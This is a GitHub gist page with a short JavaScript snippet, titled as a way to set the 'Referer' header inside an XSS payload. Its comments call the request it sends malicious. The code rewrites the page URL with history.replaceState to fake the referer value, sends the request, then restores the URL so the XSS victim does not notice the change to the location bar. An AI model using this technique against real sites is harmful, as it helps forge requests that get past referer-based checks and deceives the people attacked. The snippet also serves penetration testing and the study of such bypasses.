-
-
Save thinkst-cs/28754f4dfe1f3017458bff2fab43cd27 to your computer and use it in GitHub Desktop.
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Save the current URL path to restore after making | |
| // malicious request with faked referer header value | |
| var savedPath = window.location.pathname; | |
| var savedSearch = window.location.search; | |
| // Change URL/History to control the referer header value | |
| // Swap out "/this-is-my-fake-referer-value" to be what you need | |
| window.history.replaceState(null, '', '/this-is-my-fake-referer-value'); | |
| // Send malicious request with faked referer header value | |
| // NOTE: this assumes you're using some xhr request, adjust | |
| // based on whatever your XSS payload is actually doing | |
| xhr.send(body); | |
| // Restore the URL value to the original one before | |
| // the XSS victim notices their location bar changed | |
| window.history.replaceState(null, '', savedPath + savedSearch); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment